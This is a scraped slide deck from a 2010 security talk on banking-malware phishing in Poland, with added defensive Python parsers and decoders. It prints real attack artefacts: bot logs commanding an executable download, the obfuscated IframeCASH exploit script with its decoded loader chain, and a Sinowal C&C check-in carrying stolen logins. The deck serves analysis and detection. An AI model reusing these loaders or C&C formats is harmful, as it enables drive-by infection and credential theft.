Post on 19-Dec-2015
Phishing
(main malware phishing cases in Poland)
Tomasz Sawiak
tomasz.sawiak (at) safecomp.com
Agenda
- Introduction
- Popular transaction authorization methods
- Phishing scenarios
- Phishing roles
- Phishing malware cases in Poland
- Summary
- Ideas for the future
CONFIDENCE 2010 2
Phishing
Stealing credentials from a sea of unaware Internet users
Internet banking model (components)
Figure: components of the model. Customer side: User, Internet browser, Operating System, Customer workstation. Bank side: Internet Banking Application, WWW/application server, Operating System, Bank servers. The two sides are joined by an SSL channel.
Internet transaction authorization process
Figure: an Internet banking transaction in four stages (Stage I to Stage IV) between the User, the user-side interface (Internet browser), the communication channel and the Bank. Stage I: the user enters transaction data D1; the browser sends D2 to the bank, which returns D2 together with a transaction id Tid. Stage II: the channel carries D2, Tid; the user side shows D3, Tid'; the bank side holds D2, Tid. Stage III: the channel carries the authorization code Auth(X1); the user side shows D2, Tid; the bank side shows D4, Auth(X1) and D2, Tid. Stage IV: the bank side holds Auth(X1) and Auth(X2).
Main transaction authorization methods
- OTP/TAN: paper scratch list; hardware token (syncToken)
- Challenge-response tokens
- TDS, transaction data signing (TDS hardware devices, Java tokens, photoTAN etc.)
- SMS code
- PKI: card; file, client side; file, server side
- Static password
Many additional solutions
- Password masking
- Pictures against bots
- DA picture (double authentication picture)
- JS encryption: additional encryption of HTTP form parameters
- Linking the auth code with the transaction (e.g. with the IP address)
- Secure browser
- SMS with transaction confirmation
- etc.
Transaction authorization methods - comparison
Chart: security versus ease of use, each rated on a 0 to 5 scale, for OTP paper, OTP token, transaction SMS, TDS device, TDS photoTAN, TDS JavaToken, PKI file and static password.
Process of a phishing attack
Phase 1 - Reconnaissance (information gathering): passive; active (including registration of a new account)
Phase 2 - Prepare and test the attack scenario (malware, design of the phishing content)
Phase 3 - Phishing attack
Phase 4 - Maintaining access to the account (e.g. for multiple payments); this stage often does not exist
Phase 5 - Clearing tracks (postponing the moment the account is identified as compromised)
Attack strength
Factors that indicate the strength of a phishing attack scenario:
- Scenario complexity (attack visibility): identification and recognition. Attacks using less sophisticated methods are easier to detect, and quick detection means quick response.
- Attack length: the time window in which the stolen credentials are used by the fraudsters (e.g. online attack vs offline attack).
- Attack personalization.
- Attack scale: huge-scale attacks are easier to detect.
The way of serving phishing content
- Static phishing: e.g. a link in an e-mail
- Semi-dynamic: the malware redirects to a fake page on the phishing server; the malware injects a fake page from its config file
- Dynamic phishing: the malware changes the content of the page on the fly (e.g. injects fake form fields for TAN/password into the original page); changes the banking application flow (additional whole-page injection); the malware changes the transaction on the fly
Static phishing
There is no context.
Semi-dynamic
There is context!
Dynamic phishing - MiM/MiB
Also shown on the slide: kill Windows and reboot; format C:; change history; block chosen sites.
Roles in the phishing process
Who is guilty?
Who is guilty - the user?
Every transaction authorization method can fail ;-(
Why is phishing with malware more accurate?
- There is context!
- The certificate/SSL looks valid
- The phishing page carries the original URL address (mask or inject)
- Sometimes the user cannot distinguish the phishing content from the original bank page; it depends on the transaction authorization method used
- The fake transaction is made from the victim's IP address
- Phishing works against stronger authentication methods: users do not validate what they sign (SMS code, transaction confirmation)
- More sophisticated methods such as MiM (IP?)
MIM - Server side vs Client side
Famous phishing malware families in Poland
IFRAME CASH
ZEUS/ZBOT
SINOWAL/TORPIG
LIMBO
CLOD
MIM2009
BOT
MEBROOT
NUKLUS
MiM/SMS
IRC sdBOT case
- IRC sdBOT + a BHO dll registered under the name "Google Toolbar Module" (IE only)
- Captures all POST and GET requests
- Focused attack on ~60 chosen customers of 2 banks (their UIDs hardcoded into the dll)
- Chosen users are redirected to phishing sites on compromised WWW servers, then the HTTP flow is passed back to the original site
- IRC server in South Korea: a compromised private university server with a rootkit (probably exploited via RFI)
- Directory browsing and a stats page on the server (logs publicly available)
- Infected users: ~15K (Poland + Europe) over 2 months; log size: 1.5 GB
IRC sdBOT case - log sample
=====================================
2005-09-16-02-36-28:#BEAN::[email protected] JOIN :#bean
2005-09-16-02-36-29:#MRBEAN::[email protected] PRIVMSG #mrbean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.
2005-09-16-02-36-29:#DUDEK2::[email protected] PRIVMSG #dudek2 :Content-Disposition: form-data; name="link_group_edit_title[51773448][52106590]"
2005-09-16-02-36-29:#BEAN::[email protected] JOIN :#bean
2005-09-16-02-36-30:#BEAN::[email protected] PRIVMSG #bean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.
2005-09-16-02-36-30:#BEAN::[email protected] PRIVMSG #bean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.
2005-09-16-02-36-31:#MRBEAN::[email protected] PRIVMSG #mrbean :[DOWNLOAD]: Downloaded 106.1 KB to wtrwxcd3.exe @ 106.1 KB/sec.
2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :URL: http://poczta06.o2.pl/index.php
2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :POST: pn=0&m=&n=395&msgnr=395&marked5B5D=395&cmd=Skasuj
2005-09-16-02-36-31:#DUDEK2::[email protected] PRIVMSG #dudek2 :=====================================
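A parser for this bot-log format, added here as an example (it is not code from the presentation or from the bot). It turns the raw IRC lines into events, pulls out the dropper URLs the bots were told to download, pairs each captured POST body with the URL line the same bot logged just before it, and buckets the hosts in the captured URLs into raw IP addresses and top-level domains, the kind of breakdown the next slide charts. The sample lines are constructed in the page's layout: the bots' source field (nick!user@host) is fictional because the hosting site rendered it as [email protected], and the example.de host and the credentials in it are made up.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample in the layout of the page's log excerpt (fictional source fields).
SAMPLE_LOG = """\
2005-09-16-02-36-28:#BEAN::bot-a1!usr@192.0.2.10 JOIN :#bean
2005-09-16-02-36-29:#MRBEAN::bot-a2!usr@192.0.2.11 PRIVMSG #mrbean :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/wtrwxcd3.exe to: wtrwxcd3.exe.
2005-09-16-02-36-29:#DUDEK2::bot-a3!usr@192.0.2.12 PRIVMSG #dudek2 :Content-Disposition: form-data; name="link_group_edit_title[51773448][52106590]"
2005-09-16-02-36-31:#MRBEAN::bot-a2!usr@192.0.2.11 PRIVMSG #mrbean :[DOWNLOAD]: Downloaded 106.1 KB to wtrwxcd3.exe @ 106.1 KB/sec.
2005-09-16-02-36-31:#DUDEK2::bot-a3!usr@192.0.2.12 PRIVMSG #dudek2 :URL: http://poczta06.o2.pl/index.php
2005-09-16-02-36-31:#DUDEK2::bot-a3!usr@192.0.2.12 PRIVMSG #dudek2 :POST: pn=0&m=&n=395&msgnr=395&marked5B5D=395&cmd=Skasuj
2005-09-16-02-37-02:#DUDEK2::bot-a4!usr@192.0.2.13 PRIVMSG #dudek2 :URL: http://www.example.de/login
2005-09-16-02-37-03:#DUDEK2::bot-a4!usr@192.0.2.13 PRIVMSG #dudek2 :POST: user=alice&pass=hunter2
2005-09-16-02-37-10:#DUDEK2::bot-a5!usr@192.0.2.14 PRIVMSG #dudek2 :URL: http://10.5.2.24/admin/
"""

# <YYYY-MM-DD-HH-MM-SS>:<#CHANNEL>::<source> <PRIVMSG #chan | JOIN> :<text>
LINE_RE = re.compile(
    r'^(?P<ts>\d{4}-\d{2}-\d{2}-\d{2}-\d{2}-\d{2}):(?P<chan>#\w+)::(?P<src>\S+) '
    r'(?P<cmd>PRIVMSG|JOIN)(?: (?P<target>#\w+))? :(?P<text>.*)$')
DOWNLOAD_RE = re.compile(r'^\[DOWNLOAD\]: Downloading URL: (?P<url>\S+) to: (?P<file>\S+?)\.?$')
URL_RE = re.compile(r'^URL: (?P<url>\S+)$')
POST_RE = re.compile(r'^POST: (?P<body>.*)$')
IPV4_RE = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')


def parse_line(line):
    """Split one raw line into fields and classify it; None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    text = ev['text']
    if (d := DOWNLOAD_RE.match(text)):
        ev['kind'], ev['url'], ev['file'] = 'dropper', d['url'], d['file']
    elif (u := URL_RE.match(text)):
        ev['kind'], ev['url'] = 'victim_url', u['url']
    elif (p := POST_RE.match(text)):
        ev['kind'], ev['body'] = 'victim_post', p['body']
    else:
        ev['kind'] = 'other'
    return ev


def parse_log(text):
    return [ev for ev in map(parse_line, text.splitlines()) if ev]


def dropper_urls(events):
    """Second-stage binaries the bots were told to fetch (pivot points for blocking)."""
    return sorted({ev['url'] for ev in events if ev['kind'] == 'dropper'})


def captured_posts(events):
    """Pair each captured POST body with the URL the same bot reported just before it."""
    last_url, out = {}, []
    for ev in events:
        if ev['kind'] == 'victim_url':
            last_url[ev['src']] = ev['url']
        elif ev['kind'] == 'victim_post':
            fields = dict(parse_qsl(ev['body'], keep_blank_values=True))
            out.append((last_url.get(ev['src']), fields))
    return out


def host_bucket(host):
    return 'IP address' if IPV4_RE.match(host) else '.' + host.rsplit('.', 1)[-1].lower()


def host_distribution(events):
    """Raw IPs versus top-level domains among the hosts the victims were sending data to."""
    return Counter(host_bucket(urlsplit(ev['url']).hostname)
                   for ev in events if ev['kind'] == 'victim_url')
```

The POST body is parsed with the blank values kept, because a captured form with an empty field is still evidence of which form it was; the pairing with the preceding URL is keyed on the bot's source field, which is what distinguishes interleaved victims in one channel.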
IRC sdBOT case - logs
Chart 1 (breakdown by host type/TLD): IP address 50%, .pl 38%, .net 4%, .de 1%, .co 1%, .com 1%, .fr 1%, other 4%.
Chart 2 (breakdown by country): Poland 59%, India 7%, Brazil 4%, Turkey 3%, USA 3%, other 24%.
IRC sdBOT case - attacker activity
- Capturing one-time passwords of chosen customers (focused attack)
- Capturing credit card numbers
- Logging POST and GET requests
- Looking for hosting servers, using the bots' SYSINFO output:
[SYSINFO]: [CPU]: 2050MHz. [RAM]: 523,700KB total, 523,700KB free. [Disk]: 2,092,328KB total, 242,876KB free. [OS]: Windows 98 (4.10, Build 67766446). [Sysdir]: C:\WINDOWS\SYSTEM. [Hostname]: DNS_host_name (IP_address). [Current User]: user_name. [Date]: 16:Oct:2005. [Time]: 22:06:17. [Uptime]: 0d 0h 28m
- Searching local disks for certificates and private keys in files
- Searching Total Commander config files (encoded passwords to FTP servers)
IRC sdBOT case
- The banks put up resistance; after 3 months the attacker gave up phishing Polish banks and focused the attack on the e-gold payment system
- The server was finally closed at the beginning of 2006
- Lesson learned
IframeCASH
The characteristic iframe code in the titles of WWW sites indicates their compromise.
IframeCASH domains, their IP addresses and the adv page ranges they served:
yauwvhhzml.biz 81.95.152.229 adv400.php - adv449.php
ybrvhgwuzc.biz 81.95.152.230 adv450.php - adv499.php
ycgyhedjrz.biz 81.95.153.241 adv500.php - adv549.php
ydcvpzmnjd.biz 81.95.153.242 adv550.php - adv599.php
yezlbyuzpa.biz 81.95.153.243 adv600.php - adv649.php
yfqslqtnfa.biz 81.95.153.244 adv650.php - adv699.php
ygqvftewol.biz 81.95.153.245 adv700.php - adv749.php
yhjeepttcp.biz 81.95.153.246 adv750.php - adv799.php
URL pattern: http://iframe_domain_name/dl/advXXX.php
IframeCASH landing page (obfuscated script, decoded content, CVE list)
<script>function I(H,v){if(!v)v=' "#()-./0125679:;<=>@ACEGHIJLMPQRSTV_abcdefghijklmnoprstuvwxyz|}';var s;var F='';for(var V=0;V<H.length;V+=4){s=((v.indexOf(H.charAt(V))&255)<<18)|((v.indexOf(H.charAt(V+1))&255)<<12)|((v.indexOf(H.charAt(V+2))&255)<<6)|(v.indexOf(H.charAt(V+3))&255);F+=String.fromCharCode((s&16711680)>>16,(s&65280)>>8,s&255);}eval(F);}</script> <script>I('H.zVMCraJc;[email protected]:VmTJs<v:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/7nGoruL.mSH/Gt9>_jMsrb0/MeH/<d:>)RI.AeHsSp:>)|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RLt1V:CvaMoLv9=vdM.rh0/MeH/<d:>)RI.AeHsSp:>)|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmSL/"hHE;RGE1VI.asH>rfGEHS5beSLT"VJs<a:@MaM)-VGsAoLnvVJ.-oLn"tIC<pI(pm0.SaICMdM(pm:VmlGE1SJ="jGCra:@rkH/AhHA"SM.RRMb-hMC@zI/<pL(dk5tadIbAaL/<pGt jGbaw5s<h5smkGC<aLb-_MVLv9Ayn5bAuH>uy5s-lL.maM(uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorbICmhJCAiGC<s7o_v5bSpJ>uy5sabLb-iH>uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorbICmhJCAiGC<s7o_v5bSpJ>uy5sabLb-iH>uT2>i_Js7rJCAjM#vtLbapH=RT:.abLb-iH="tIC<pI(pm0.SaICMdM(pm0.1kLb<aLVpl0.HnGCraGbznH.An:> RLt1V:CHeJ.miHCrSH/Gt9>_jI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yICHnGCra0/MeH/<d:>)RI.AeHsSp:>)RGbznH.An:> 
RHc1SJCATJt1_HE0z6#"oLb6zHbahJ.raJC-_MVLv9=vdM.p|:#zeHc1SJC@|0T_xH.zVMCraJc;jMt1eM.@d0VmeHc1SJC@RMsa_M.Rz6="dHCacI/;z6="TJt1_HE0z6#"bLb-iHC1kLb<aLVpl0/7nGorTGCLjI/<i:VlkICHnGCra:T0e9s<kGtAiHCvp5cMnIE<a2#0yGE"lJ.Ap0/MeH/<d:>)RI.AeHsSp:>)R;A1(=)aC<>rhJs-_HE1SH/Gt9>_jIb-n0.7kH.@z;szrJc<aLVuy5p-;@)m-A(uT2>i_Js7rJCAjM#vtLbapH=RT:#zTJs<v:VlkI/<iJ(uT2>h ')</script>
document.write("<html><body>");
document.write("<iframe src=xpladv799.wmf width=1 height=1></iframe>");
document.write("<iframe src=new799.html width=1 height=1></iframe>");
document.write("<applet archive=java.jar code=GetAccess.class width=1 height=1> <param name=ModulePath value=http://yhjeepttcp.biz/dl/loaderadv799_2.exe></applet>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=fillmemadv799.htm></iframe>");
document.write("<iframe width=1 height=1 border=0 frameborder=0 src=bag.htm></iframe>");
document.write("<applet width=1 height=1 ARCHIVE=loaderadv799.jar code=Counter></APPLET>");
document.write("</body></html>");
CVE-2004-0380 CVE-2005-2123 CVE-2005-2124 CVE-2005-1790 CVE-2006-0003 CVE-2006-3730 CVE-2006-4868
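A Python port of the I() decoder above, added as an example (not code from the presentation or from the IframeCASH kit) so that the payload can be decoded offline instead of being passed to eval(): I() is a base64 variant with a custom 64-symbol alphabet, four symbols per three bytes, and the port keeps its two JavaScript quirks (an unknown symbol becomes 0xFF, a short trailing group is padded with alphabet[0]). The encode() helper is an assumption used only to build round-trip test vectors; extract_payload() assumes the call appears as I('...') with no single quote inside the literal, which holds because the alphabet contains none.

```python
import re

# The 64-symbol alphabet from the page's I() function (position = 6-bit value).
ALPHABET = ' "#()-./0125679:;<=>@ACEGHIJLMPQRSTV_abcdefghijklmnoprstuvwxyz|}'


def decode(encoded, alphabet=ALPHABET):
    """Port of I(): each group of 4 symbols carries 24 bits, emitted as 3 Latin-1 characters.
    JavaScript quirks mirrored: indexOf() of a symbol outside the alphabet is -1, which
    '& 255' turns into 0xFF; charAt() past the end yields '' whose indexOf() is 0, so a
    short trailing group is padded with the value 0 (alphabet[0], the space)."""
    index = {c: i for i, c in enumerate(alphabet)}
    out = bytearray()
    for pos in range(0, len(encoded), 4):
        group = encoded[pos:pos + 4]
        vals = [index.get(c, -1) & 255 for c in group] + [0] * (4 - len(group))
        word = (vals[0] << 18) | (vals[1] << 12) | (vals[2] << 6) | vals[3]
        out += bytes(((word >> 16) & 255, (word >> 8) & 255, word & 255))
    return out.decode('latin-1')


def encode(text, alphabet=ALPHABET):
    """Inverse of decode(), an assumption used here to build test vectors; the kit's own
    encoder is not on the page. Input is padded with NUL bytes to a multiple of three."""
    data = text.encode('latin-1')
    symbols = []
    for pos in range(0, len(data), 3):
        chunk = data[pos:pos + 3].ljust(3, b'\x00')
        word = (chunk[0] << 16) | (chunk[1] << 8) | chunk[2]
        symbols.append(''.join(alphabet[(word >> shift) & 63] for shift in (18, 12, 6, 0)))
    return ''.join(symbols)


def extract_payload(html):
    """Pull the literal handed to I('...') out of a captured page instead of running it."""
    m = re.search(r"I\('([^']*)'\)", html)
    return m.group(1) if m else None


def decode_page(html):
    """Decoded script text with the padding NULs removed, or None if no I('...') call is present."""
    payload = extract_payload(html)
    return decode(payload).rstrip('\x00') if payload is not None else None
```

Because the alphabet omits the single quote, the backslash and the angle-bracket-free characters that would break a JavaScript string literal, the encoded payload can be embedded directly in the I('...') call; that is also why a simple regex on the quote is enough to cut it out.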
IframeCASH
CONFIDENCE 2010 29
Sinowal/Mebroot
Malware components:
- Exe loader (ibm0000n.exe) with a static key in the registry; later msasvc.exe (service "Microsoft Authenticate Service")
- 2 dlls (ibm0000n.dll, ibm000n+1.dll): the main malware components
- $_2341233.tmp: capture data history
- $_2341234.tmp: config file with the attacked domains
- $_2341235.tmp: timestamp of the last sync with the dropzone
Backend (2 different components):
- C&C and dropzone
- Phishing server
Sinowal - phishing behaviour
1. The user opens the original banking site
2. The malware checks whether the URL's domain exists in its config file
3. The malware asks the phishing server for the phishing page content and for the conditions under which the phishing page should be presented
4. When the phishing condition is met, the malware injects the phishing page into the flow, e.g. after the logon page or during payment confirmation (context)
5. The stolen data is sent to the phishing server
6. The user continues using the original internet banking page
Sinowal (communication channel)
POST /XFsQa5/d9FX98404tcGW0JAJ2XXJ6cS4wK1ViJSJhHlAx/OP8VTFHJSa+J2FsY+diEHZdcXpxLSNlDnRtcnEVVXewsLQAIkUuIPdlMns3pSkAKAo2NjI1NGkFN2I3HBtcd8WxwXJSMCBWsyJWVzaiUHcFKmN1ZSI7ZQIDJSlgSg HTTP/1.1
Content-Type: multipart/form-data; boundary=swefasvqdvwxff
Host: rafer71.com
Content-Length: 1000
User-Agent: MSID [17A1811109ACDF54EA05C4AAEB6D888C]|148a|76
Cache-Control: no-cache

--swefasvqdvwxff---
Content-Disposition: form-data; name=datafile; filename="data.str"
Content-Type: application/octet-stream

POST /XFsQa5/id=17A1811109ACDF54EA05C4AAEB6D888C&sv=76&build=148a&ts=1130334165&ip=10.5.2.24&sport=9880&hport=9896&os=5.1.2600&cn=Poland HTTP/1.1
Body (stolen-data record, decoded):
0x07 0x00 0x17 0x1c *E 0xac 0x00 0x00 0x00 IP 10.5.2.24 0x0a [148a] 0x0a Internet Explorer:http://poczta06.o2.pl/ 0x09 login,, 0x0a Internet Explorer:http://poczta06.o2.pl/index.php 0x09 login_moj,haslo, 0x0a PSTPASSWORDS_END 0x0a OUTLOOK_EMAIL_LABEL 0x05 0x04 0x17 0x1c *E 0xbc 0x01 0x00 0x00 IP 10.5.2.24 0x0a [148a] 0x0a bookmarksgrab 0x0d 0x0a http://www.o2.pl/ 0x0a http://www.microsoft.com/isapi/redir.dll?prd=windows&sbp=mediaplayer&plcid=&pver=6.1&os=&over=&olcid=&clcid=&ar=Media&sba=RadioBar&o1=&o2=&o3= 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=hotmail 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=CLinks 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windowsmedia 0x0a http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=windows 0x0a 0x00

Check-in fields:
- id: infected host UID (MD5)
- sv: source version (e.g. sv=76)
- build: e.g. build=148, VASI etc.
- ts: timestamp
- ip: IP address
- sport: SOCKS port
- hport: HTTP proxy port
- os: OS version
- cn: country name
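A decoder and detector for the check-in above, added as an example (not code from the presentation or from Sinowal). parse_checkin() splits the path into the gate directory and the fields listed in the legend, types them (the timestamp becomes a UTC datetime) and cross-checks them against the id, build and version repeated in the MSID User-Agent; scan_proxy_log() runs that over proxy log lines and also flags requests that carry only the User-Agent, such as the encrypted upload on the first request. The log line format, the client addresses and the request times are constructed; the bot id, build, gate directory and C&C host are the ones shown on the slide.

```python
import re
from datetime import datetime, timezone
from urllib.parse import parse_qsl

# Check-in shapes seen on the slide: the "query string" sits in the path after the gate
# directory with no '?', and the User-Agent repeats the bot id, build and source version:
#   MSID [<32-hex bot id>]|<build>|<sv>
CHECKIN_RE = re.compile(r'^/(?P<gate>[^/]+)/(?P<qs>id=[^ ?#]*)$')
UA_RE = re.compile(r'^MSID \[(?P<id>[0-9A-Fa-f]{32})\]\|(?P<build>[^|]+)\|(?P<sv>\d+)$')
BOT_ID_RE = re.compile(r'^[0-9A-F]{32}$')


def parse_checkin(path, user_agent=''):
    """Decode one cleartext check-in into typed fields; None if the path is not one."""
    m = CHECKIN_RE.match(path)
    if not m:
        return None
    f = dict(parse_qsl(m['qs'], keep_blank_values=True))
    if not BOT_ID_RE.match(f.get('id', '')) or not f.get('ts', '').isdigit():
        return None
    rec = {
        'gate': m['gate'],
        'id': f['id'],                    # infected host UID (MD5)
        'sv': int(f.get('sv', 0)),        # source version
        'build': f.get('build', ''),      # e.g. 148a, VASi
        'ts': datetime.fromtimestamp(int(f['ts']), tz=timezone.utc),
        'ip': f.get('ip'),                # the bot's own, often private, address
        'sport': int(f.get('sport', 0)),  # SOCKS port opened on the victim
        'hport': int(f.get('hport', 0)),  # HTTP proxy port opened on the victim
        'os': f.get('os'),
        'cn': f.get('cn'),
    }
    ua = UA_RE.match(user_agent)
    # A mismatch between path and User-Agent points at a replay or at a different bot build.
    rec['ua_consistent'] = (bool(ua) and ua['id'].upper() == rec['id']
                            and ua['build'] == rec['build'] and int(ua['sv']) == rec['sv'])
    return rec


# Constructed proxy log: <time> <client> <method> <host> <path> "<user-agent>"
SAMPLE_PROXY_LOG = """\
2005-10-26T13:42:45Z 10.5.2.24 POST rafer71.com /XFsQa5/id=17A1811109ACDF54EA05C4AAEB6D888C&sv=76&build=148a&ts=1130334165&ip=10.5.2.24&sport=9880&hport=9896&os=5.1.2600&cn=Poland "MSID [17A1811109ACDF54EA05C4AAEB6D888C]|148a|76"
2005-10-26T13:42:46Z 10.5.2.24 POST rafer71.com /XFsQa5/d9FX98404tcGW0JAJ2XXJ6cS4wK1Vi "MSID [17A1811109ACDF54EA05C4AAEB6D888C]|148a|76"
2005-10-26T13:43:01Z 10.5.2.25 GET www.example.com /index.html "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
"""
LOG_RE = re.compile(r'^(?P<when>\S+) (?P<client>\S+) (?P<method>\S+) (?P<host>\S+) '
                    r'(?P<path>\S+) "(?P<ua>[^"]*)"$')


def scan_proxy_log(text):
    """Alert on decoded check-ins and on any other request carrying the MSID User-Agent."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = parse_checkin(m['path'], m['ua'])
        ua = UA_RE.match(m['ua'])
        if rec:
            alerts.append({'client': m['client'], 'cnc': m['host'], 'reason': 'sinowal-checkin',
                           'bot_id': rec['id'], 'build': rec['build'], 'seen': rec['ts']})
        elif ua:
            alerts.append({'client': m['client'], 'cnc': m['host'], 'reason': 'sinowal-user-agent',
                           'bot_id': ua['id'].upper(), 'build': ua['build'], 'seen': None})
    return alerts
```

The sport and hport values are worth keeping in the alert in practice: they are the ports the bot opens on the victim for the SOCKS and HTTP proxy services, so they tell the responder which inbound connections on that host are attacker traffic.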
Sinowal analysis
Sinowal code samples
File name | Date | Code size | SV | Build | MD5
ibm00001.dll 13-12-2005 11:05:28 0xbe00 43 143a EFEDB035686CED40E05BD3BC7469D4B5
ibm00002.dll 13-12-2005 11:05:41 0x8600 43 143a CF1E33D5E361BB6E24484F98F26180D5
ibm00001.dll 3-03-2006 10:59:46 0xbe00 52 148a 912DEE8DD3C1375EB703D41BABDE52D7
ibm00002.dll 3-03-2006 10:59:08 0x9600 52 148a DB417C3FD237F0A9D2E69BA133706EAA
ibm00001.dll 16-03-2006 10:31:52 0xbe00 53 148a 8AFB0A95688D99B4480A2BD955C84DD9
ibm00002.dll 16-03-2006 10:32:03 0x9800 53 148a 45A5B3C582C3CB6A75DAAD0407D9E758
ibm00001.dll 3-04-2006 13:26:54 0xbe00 53 Build VASi BC8B7727288C748AF15BC0468C91C730
ibm00002.dll 3-04-2006 13:27:08 0xA600 53 Build VASi 31808811E25DC4882DE86CE4F43E85F3
ibm00001.dll 4-04-2006 12:01:25 0xbe00 54 Build VASi 5C3666B84C2E9DB151F661701EF98916
ibm00002.dll 4-04-2006 12:01:30 0xA400 54 Build VASi E6C9CE1ACEB7B2D2E9D59C1A3B86ED51
ibm00001.dll 16-05-2006 10:35:14 0xbe00 56 testtraf1 725D108B17234095342673E2B0516794
ibm00002.dll 16-05-2006 10:35:20 0xA600 56 testtraf1 43A87DE41A28439562EFFE38977AAA3A
ibm00001.dll 29-05-2006 15:28:53 0xbe00 58 Build VASi 66886BD2508C4970B343858EBB17920F
ibm00002.dll 29-05-2006 15:28:59 0xA600 58 Build VASi 5A4C2AB7681FADDF53D996E18D40A4AC
ibm00001.dll 02-06-2006 07:25:32 0xc000 58 148a 1A9198A711167100BD2E8241CD68EEE1
ibm00002.dll 02-06-2006 07:25:39 0xA800 58 148a 5B30BFF16F0B829EAB42884A94E0AE6A
ibm00001.dll 20-07-2006 12:12:09 0xD200 66 Build VASi 726D8311E39CACC54F6F4DF367B07B03
ibm00002.dll 20-07-2006 12:12:16 0xA200 66 Build VASi ADD68075F8F46FC4ABC8D436B2083B3A
ibm00001.dll 10-07-2006 08:48:24 0xD200 60 148a F2BE85309541A4EED5482C1041F24D29
ibm00002.dll 10-07-2006 08:48:31 0xA200 60 148a 1EF5A3AC9A8BEBFE88C07F03027A4ACD
ibm00001.dll 27-07-2006 14:36:59 0xD400 69 Build VASi 71D0C299F784E32F516472318CD5EDA0
ibm00002.dll 27-07-2006 14:37:05 0x9E00 69 Build VASi E38ECCA490886C179D05C43F4934A8E3
ibm00001.dll 29-07-2006 14:06:28 0xD600 70 148a 5C5945373C2A2461031C54CAD0EA9779
ibm00002.dll 29-07-2006 14:06:35 0x9E00 70 148a DEEC1012FC99156BFFB143832B6FCF10
ibm00001.dll 22-08-2006 14:35:50 0xD200 73 Build VASi F90A928B986E78684EFFED9F62C02657
ibm00002.dll 22-08-2006 14:35:57 0xAC00 73 Build VASi 18E527E2ABC2344A6A83F8194445FDCA
ibm00001.dll 22-08-2006 14:29:33 0xD200 73 148a 848857B19D418CFFDA88EFD21622662D
ibm00002.dll 22-08-2006 14:29:40 0xAC00 73 148a EBB833EB3F06B0896925650512D6F506
ibm00001.dll 22-09-2006 8:27:29 0xD400 75 Build VASi DE7C9CAA1ACA41A071C14104D5417E9D
ibm00002.dll 22-09-2006 8:27:37 0xAC00 75 Build VASi DFDFD334787489354BFAA4CFD43D7DC6
ibm00001.dll 29-09-2006 16:04:17 0xD400 76 148a D2349718FC632127CC65F43FD63795F9
ibm00002.dll 29-09-2006 16:04:23 0xAE00 76 148a C4549F5BED962F90B804720FC4ED87AD
ibm00001.dll 10-10-2006 08:57:23 0xD400 77 Build VASi 0CACAF29B970D8BADD8D57DDCCEE163A
ibm00002.dll 10-10-2006 08:57:31 0xAE00 77 Build VASi BD38553E02531BFDB341A735E36A3FD5
Ibm00001.dll 20-10-2006 10:37:09 0xD200 80 149 D3EB4B6C492EA6654A29B271A8D89385
Ibm00002.dll 20-10-2006 10:37:17 0xAE00 80 149 EEEACBFF9B43503140F2E5B8316E823F
Ibm00001.dll 11-11-2006 17:40:16 0xD400 82 Build Vasi3 3ED23CA6CAD63822CEADD9974850F9AB
